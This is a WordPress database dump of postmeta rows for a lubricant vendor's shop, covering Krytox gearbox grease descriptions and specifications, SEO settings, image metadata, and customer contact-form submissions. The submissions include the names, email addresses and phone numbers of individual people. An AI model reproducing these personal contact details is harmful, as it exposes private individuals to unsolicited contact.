INSERT INTO `wp_postmeta` VALUES (33201, 3722, '_ywtm_content_tab_description', '<h3>Krytox GB M0 | Sootblower | Gearbox Grease | Premium Performance Gearbox Greases</h3>\r\nPerformance Lubricants has developed a series of greases specifically designed to lubricate and protect high temperature gearbox gears, bearings, and seals. Krytox™ fluoropolymer greases provide excellent lubrication and will not oxidize in the most demanding high temperature environments, even in applications with operating temperatures up to approximately 270 °C (518 °F). Use of Krytox™ gearbox grease will help eliminate bearing and gear failures resulting from lubricant oxidation, lead to longer seal life, and extend gearbox life. In many applications, Krytox GB M0 gearbox grease will last the life of the gearbox, greatly reducing\r\nor eliminating the need for maintenance and re-lubrication. When compared to oil-lubricated systems, use of Krytox™ grease can also significantly help reduce lubricant leakage related to seal failure.\r\n\r\nKrytox™ gearbox greases are available in various base oil viscosities to provide the best performance for your given environment. There are currently two grades of premium performance gearbox grease, Krytox™ GB M0 and GB H0, which are semi-fluid lubricants specifically designed for enclosed gearbox lubrication. As many gearbox designs utilize bearings that are not lubricated by the internal lubricant reservoir and require periodic re-lubrication (and this grease is often forced past the bearing seals into the reservoir), Krytox™ GB A2 and C2 have been added to the line to limit cross-contamination of the internal grease with a non-compatible bearing grease.\r\n\r\nPlease consult with Krytox™ <a href="https://www.miller-stephenson.com/tech-support/">Technical Service</a> to determine if one of these grades is right for your application or if an additional grade is required.\r\n\r\nKrytox™ greases are made from clear, colorless fluorinated, synthetic oils that are non-reactive, non-flammable, safe in harsh environments, long lasting, and compatible with all seal materials. Krytox™ is a perfluoropolyether-based polymer composed of fluorine, oxygen, and carbon. No hydrogen is present in the molecule, resulting in exceptional stability and non-flammability.'); 
INSERT INTO `wp_postmeta` VALUES (33202, 3722, '_product_image_gallery', '383'); 
INSERT INTO `wp_postmeta` VALUES (33203, 3722, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (33204, 3722, '_yoast_wpseo_primary_product_cat', '515'); 
INSERT INTO `wp_postmeta` VALUES (33205, 3722, '_yoast_wpseo_focuskw_text_input', 'Krytox GB A2'); 
INSERT INTO `wp_postmeta` VALUES (33206, 3722, '_yoast_wpseo_focuskw', 'Krytox GB A2'); 
INSERT INTO `wp_postmeta` VALUES (33207, 3722, '_yoast_wpseo_title', 'Krytox GB A2 | Krytox Sootblower Gearbox Grease | Performance Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (33208, 3722, '_yoast_wpseo_metadesc', 'Krytox GB A2 fluoropolymer greases provide excellent lubrication and will not oxidize in the most demanding high temperature environments.'); 
INSERT INTO `wp_postmeta` VALUES (33209, 3722, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (33210, 3722, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (33211, 3722, '_yoast_wpseo_linkdex', '62'); 
INSERT INTO `wp_postmeta` VALUES (33224, 3723, '_wp_attached_file', '2017/02/shutterstock_359496941.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33225, 3723, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:668;s:4:"file";s:34:"2017/02/shutterstock_359496941.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_359496941-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_359496941-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_359496941-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_359496941-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_359496941-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_359496941-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_359496941-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"8";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33226, 3722, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (33227, 3722, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (33228, 3724, '_edit_lock', '1487965585:2'); 
INSERT INTO `wp_postmeta` VALUES (33229, 3724, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (33230, 3724, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (33231, 3724, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (33232, 3724, '_thumbnail_id', '3725'); 
INSERT INTO `wp_postmeta` VALUES (33233, 3724, '312_default_editor', '<table width="1093">\r\n<tbody>\r\n<tr>\r\n<td width="373"><strong>Krytox Gearbox Grease Grade</strong></td>\r\n<td style="text-align: center;" width="180">GB M0</td>\r\n<td style="text-align: center;" width="180">GB H0</td>\r\n<td style="text-align: center;" width="180">GB A2</td>\r\n<td style="text-align: center;" width="180">GB C2</td>\r\n</tr>\r\n<tr>\r\n<td>NLGI Grade</td>\r\n<td style="text-align: center;">0</td>\r\n<td style="text-align: center;">0</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td>Penetration, ASTM D217</td>\r\n<td style="text-align: center;">355–385</td>\r\n<td style="text-align: center;">355–385</td>\r\n<td style="text-align: center;">265–295</td>\r\n<td style="text-align: center;">265–295</td>\r\n</tr>\r\n<tr>\r\n<td>Thickener Chemistry</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">PTFE</td>\r\n</tr>\r\n<tr>\r\n<td>Dropping Point, °C (°F)</td>\r\n<td style="text-align: center;">&gt;290 (&gt;554)</td>\r\n<td style="text-align: center;">&gt;290 (&gt;554)</td>\r\n<td style="text-align: center;">&gt;290 (&gt;554)</td>\r\n<td style="text-align: center;">&gt;290 (&gt;554)</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity, 40 °C (104 °F)</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">500</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">500</td>\r\n</tr>\r\n<tr>\r\n<td>Estimated Useful Temperature Range, °C (°F)</td>\r\n<td style="text-align: center;">-40–210 (-40–410)</td>\r\n<td style="text-align: center;">-4–270 (25–518)</td>\r\n<td style="text-align: center;">-40–210 (-40–410)</td>\r\n<td style="text-align: center;">-4–270 (25–518)</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">Gray, Creamy</td>\r\n<td style="text-align: center;">Gray, Creamy</td>\r\n<td style="text-align: center;">Gray, Creamy</td>\r\n<td style="text-align: center;">Gray, Creamy</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td style="text-align: center;">2.1</td>\r\n<td style="text-align: center;">2.1</td>\r\n<td style="text-align: center;">2.1</td>\r\n<td style="text-align: center;">2.1</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (33234, 3724, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (33235, 3724, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (33236, 3724, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (33237, 3724, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">Syringe</td>\r\n<td width="125">Tube</td>\r\n<td width="125">Jar</td>\r\n<td width="125">Cartridge</td>\r\n<td width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">0.5 oz.</td>\r\n<td width="125">2 oz.</td>\r\n<td width="125">0.5 kg</td>\r\n<td width="125">0.8 kg</td>\r\n<td width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">1 oz.</td>\r\n<td width="125">-</td>\r\n<td width="125">1 kg</td>\r\n<td width="125"></td>\r\n<td width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">2 oz.</td>\r\n<td width="125">8 oz.</td>\r\n<td width="125"></td>\r\n<td width="125"></td>\r\n<td width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (33238, 3724, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (33239, 3724, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (33240, 3724, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (33241, 3724, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (33242, 3724, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (33243, 3724, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33244, 3724, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33245, 3724, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (33246, 3724, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33247, 3724, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (33248, 3724, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (33249, 3724, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (33250, 3724, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (33251, 3724, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (33252, 3724, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (33253, 3724, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (33254, 3724, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (33255, 3724, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (33256, 3724, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (33257, 3724, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (33258, 3724, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33259, 3724, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33260, 3724, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (33261, 3724, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (33262, 3724, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (33263, 3724, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (33264, 3724, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33265, 3724, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33266, 3724, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (33267, 3724, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (33268, 3724, '_ywtm_content_tab_description', '<h3>Krytox GB M0 | Sootblower | Gearbox Grease | Premium Performance Gearbox Greases</h3>\r\nPerformance Lubricants has developed a series of greases specifically designed to lubricate and protect high temperature gearbox gears, bearings, and seals. Krytox™ fluoropolymer greases provide excellent lubrication and will not oxidize in the most demanding high temperature environments, even in applications with operating temperatures up to approximately 270 °C (518 °F). Use of Krytox™ gearbox grease will help eliminate bearing and gear failures resulting from lubricant oxidation, lead to longer seal life, and extend gearbox life. In many applications, Krytox GB M0 gearbox grease will last the life of the gearbox, greatly reducing\r\nor eliminating the need for maintenance and re-lubrication. When compared to oil-lubricated systems, use of Krytox™ grease can also significantly help reduce lubricant leakage related to seal failure.\r\n\r\nKrytox™ gearbox greases are available in various base oil viscosities to provide the best performance for your given environment. There are currently two grades of premium performance gearbox grease, Krytox™ GB M0 and GB H0, which are semi-fluid lubricants specifically designed for enclosed gearbox lubrication. As many gearbox designs utilize bearings that are not lubricated by the internal lubricant reservoir and require periodic re-lubrication (and this grease is often forced past the bearing seals into the reservoir), Krytox™ GB A2 and C2 have been added to the line to limit cross-contamination of the internal grease with a non-compatible bearing grease.\r\n\r\nPlease consult with Krytox™ <a href="https://www.miller-stephenson.com/tech-support/">Technical Service</a> to determine if one of these grades is right for your application or if an additional grade is required.\r\n\r\nKrytox™ greases are made from clear, colorless fluorinated, synthetic oils that are non-reactive, non-flammable, safe in harsh environments, long lasting, and compatible with all seal materials. Krytox™ is a perfluoropolyether-based polymer composed of fluorine, oxygen, and carbon. No hydrogen is present in the molecule, resulting in exceptional stability and non-flammability.'); 
INSERT INTO `wp_postmeta` VALUES (33269, 3724, '_product_image_gallery', '383'); 
INSERT INTO `wp_postmeta` VALUES (33270, 3724, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (33271, 3724, '_yoast_wpseo_primary_product_cat', '515'); 
INSERT INTO `wp_postmeta` VALUES (33272, 3724, '_yoast_wpseo_focuskw_text_input', 'Krytox GB C2'); 
INSERT INTO `wp_postmeta` VALUES (33273, 3724, '_yoast_wpseo_focuskw', 'Krytox GB C2'); 
INSERT INTO `wp_postmeta` VALUES (33274, 3724, '_yoast_wpseo_title', 'Krytox GB C2 | Krytox Sootblower Gearbox Grease | Performance Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (33275, 3724, '_yoast_wpseo_metadesc', 'Krytox GB C2 fluoropolymer greases provide excellent lubrication and will not oxidize in the most demanding high temperature environments.'); 
INSERT INTO `wp_postmeta` VALUES (33276, 3724, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (33277, 3724, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (33278, 3724, '_yoast_wpseo_linkdex', '67'); 
INSERT INTO `wp_postmeta` VALUES (33291, 3725, '_wp_attached_file', '2017/02/shutterstock_447896557.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33292, 3725, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/02/shutterstock_447896557.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_447896557-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_447896557-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_447896557-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_447896557-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_447896557-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_447896557-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_447896557-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33293, 3724, '_wp_old_slug', 'krytox-gb-a2-copy'); 
INSERT INTO `wp_postmeta` VALUES (33294, 3724, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (33295, 3724, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (33296, 3726, '_edit_lock', '1494603455:2'); 
INSERT INTO `wp_postmeta` VALUES (33297, 3726, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (33298, 3727, '_wp_attached_file', '2017/02/Krytox-Cost-Saving.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33299, 3727, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:981;s:6:"height";i:713;s:4:"file";s:30:"2017/02/Krytox-Cost-Saving.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:30:"Krytox-Cost-Saving-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:30:"Krytox-Cost-Saving-800x581.jpg";s:5:"width";i:800;s:6:"height";i:581;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:30:"Krytox-Cost-Saving-768x558.jpg";s:5:"width";i:768;s:6:"height";i:558;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:30:"Krytox-Cost-Saving-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:30:"Krytox-Cost-Saving-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:30:"Krytox-Cost-Saving-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:30:"Krytox-Cost-Saving-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"13";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33300, 3728, '_wp_attached_file', '2017/02/Lubrication-Cost-Savings.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33301, 3728, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:879;s:6:"height";i:1041;s:4:"file";s:36:"2017/02/Lubrication-Cost-Savings.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:36:"Lubrication-Cost-Savings-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:36:"Lubrication-Cost-Savings-676x800.jpg";s:5:"width";i:676;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:36:"Lubrication-Cost-Savings-768x910.jpg";s:5:"width";i:768;s:6:"height";i:910;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:36:"Lubrication-Cost-Savings-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"Lubrication-Cost-Savings-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:36:"Lubrication-Cost-Savings-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:36:"Lubrication-Cost-Savings-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"11";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33302, 3726, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (33303, 3726, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (33304, 3726, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (33305, 3726, '_yoast_wpseo_metadesc', 'Krytox lubricants drive cost savings by performing better than its competitors. Cheap lubricants can be harmful to the manufacturing process.'); 
INSERT INTO `wp_postmeta` VALUES (33306, 3726, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (33307, 3726, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (33308, 3726, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (33309, 3730, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33310, 3730, '_seq_num', '367'); 
INSERT INTO `wp_postmeta` VALUES (33311, 3730, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33312, 3730, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33313, 3730, '_field_1', 'PRIYA M'); 
INSERT INTO `wp_postmeta` VALUES (33314, 3730, '_field_10', 'UMAC AVIONICS PTE LIMITED'); 
INSERT INTO `wp_postmeta` VALUES (33315, 3730, '_field_2', 'tech@umacintl.com'); 
INSERT INTO `wp_postmeta` VALUES (33316, 3730, '_field_8', '(656) 846-4085'); 
INSERT INTO `wp_postmeta` VALUES (33317, 3730, '_field_3', 'URGENT\r\nDear Sir,\r\n\r\nPlease quote for the below along with technical data sheet.\r\n\r\nSl No	Part Number	Part Description	Qty	Your Price\r\n1	EC75-W-EP	PAINT FINISHING WHITE (0.5LTR/TIN)	6 LITRES	\r\n2	ALOCORM 1200	ALOCORM 1200 BRUSH LIQUID KIT (4.5LTR/TIN)	50 LITRES	\r\n3	LPS1	LUBRICANT (0.5LTR/TIN)	6 LITRES	\r\n4	242	LOCTITE (50ML/EACH)	12 EACH	\r\n5	PR 30B	CROMTECH PRIMER (0.5LTR/TIN)	6 LITRES	\r\n6	EA9394	LIQUID SHIM (0.5LTR/TIN)	6 LITRES	\r\n7	TRAFFIC WAX	RELEASE AGENT JOHNSONS WAX	6 TINS	\r\n8	BOELUBE 70302-12	LUBRICANT (4LTR/TIN)	44 LITRES	\r\n\r\nAlso confirm the below points\r\n1. Manufacturer Name.\r\n2. Will Manufacturer COC be provided?                                        \r\n3. MSDS -Please attach with the reply mail.\r\n4. Delivery lead time\r\n5. EX WORKS pick up point\r\n6. Currency quoted\r\n7. Items should have more than 80% shelf life at the time of shipment.\r\n8. IATA / Export packing charges if any:\r\n9. Certificate of Analysis(COA)\r\n10. The items shall be supplied in individual packs with complete life details mentioned on the each pack.\r\n\r\nWITH REGARDS, \r\n\r\nPriya\r\nUMAC AVIONICS PTE LIMITED\r\n391B ORCHARD ROAD\r\n#23-01 NGEE ANN CITY TOWER B, \r\nSINGAPORE - 238874.\r\nTelefax : +65 68464085\r\nwww.umacintl.com\r\nEmail: tech@umacintl.com\r\n\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (33318, 3730, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33319, 3730, '_sub_id', '3730'); 
INSERT INTO `wp_postmeta` VALUES (33320, 3731, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33321, 3731, '_seq_num', '368'); 
INSERT INTO `wp_postmeta` VALUES (33322, 3731, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33323, 3731, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33324, 3731, '_field_1', 'Shawn Christian'); 
INSERT INTO `wp_postmeta` VALUES (33325, 3731, '_field_10', 'V3 Data Intel Inc'); 
INSERT INTO `wp_postmeta` VALUES (33326, 3731, '_field_2', 'shawn.christian@v3dataintel.com'); 
INSERT INTO `wp_postmeta` VALUES (33327, 3731, '_field_8', '(732) 320-9114'); 
INSERT INTO `wp_postmeta` VALUES (33328, 3731, '_field_3', 'Hi,\r\n\r\nWould you be interested to acquire an opt-in email list of “Decision Makers/Engineers from Aerospace/Defence Industry”?\r\n\r\nTo name few titles: CEO, CTO, President, VP, Director, Engineers, Managers from Engineering/Project/Sales &amp; Marketing, Scientists, R&amp;D professionals, etc.\r\n\r\nNeed few samples for your review? Use the customized options to filter your target audience. I will get back to you with relevant details- \r\n\r\nTarget Industry:  ______; Geography:  ______; Job Title (Any):  ______:\r\n\r\nThanks for your time.\r\n\r\n-Shawn Christian\r\nInside-Sales Executive\r\nshawn.christian@v3dataintel.com\r\nWe cover - Email Appending; Email Campaign; Company Profiling; List Acquisition.\r\n'); 
INSERT INTO `wp_postmeta` VALUES (33329, 3731, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33330, 3731, '_sub_id', '3731'); 
INSERT INTO `wp_postmeta` VALUES (33331, 3732, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33332, 3732, '_seq_num', '369'); 
INSERT INTO `wp_postmeta` VALUES (33333, 3732, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33334, 3732, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33335, 3732, '_field_1', 'Tamar Bania'); 
INSERT INTO `wp_postmeta` VALUES (33336, 3732, '_field_10', 'BDI'); 
INSERT INTO `wp_postmeta` VALUES (33337, 3732, '_field_2', 'tbania@bdi-usa.com'); 
INSERT INTO `wp_postmeta` VALUES (33338, 3732, '_field_8', '(216) 642-9100'); 
INSERT INTO `wp_postmeta` VALUES (33339, 3732, '_field_3', 'Good afternoon!\nI am working on data migration to our upcoming SAP implementation, do you have an order minimum?\nThank you!\n~Tamar\n'); 
INSERT INTO `wp_postmeta` VALUES (33340, 3732, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33341, 3732, '_sub_id', '3732'); 
INSERT INTO `wp_postmeta` VALUES (33342, 3733, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (33343, 3733, '_seq_num', '235'); 
INSERT INTO `wp_postmeta` VALUES (33344, 3733, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33345, 3733, '_field_12', 'Marty Spilde'); 
INSERT INTO `wp_postmeta` VALUES (33346, 3733, '_field_13', 'South Dakota Partners'); 
INSERT INTO `wp_postmeta` VALUES (33347, 3733, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (33348, 3733, '_field_14', 'marty.spilde@sdpartnersinc.com'); 
INSERT INTO `wp_postmeta` VALUES (33349, 3733, '_field_15', '(605) 874-6982'); 
INSERT INTO `wp_postmeta` VALUES (33350, 3733, '_field_16', 'Hello,\r\nCan you send me the Data Sheet for MS-560/562. There is no link on the website.\r\nChecking if it is No-Clean and able to be used in a No-Clean process and be left on the boards.\r\nThanks,'); 
INSERT INTO `wp_postmeta` VALUES (33351, 3733, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (33352, 3733, '_sub_id', '3733'); 
INSERT INTO `wp_postmeta` VALUES (33353, 3734, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33354, 3734, '_seq_num', '370'); 
INSERT INTO `wp_postmeta` VALUES (33355, 3734, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33356, 3734, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33357, 3734, '_field_1', 'Pamela Kerchner'); 
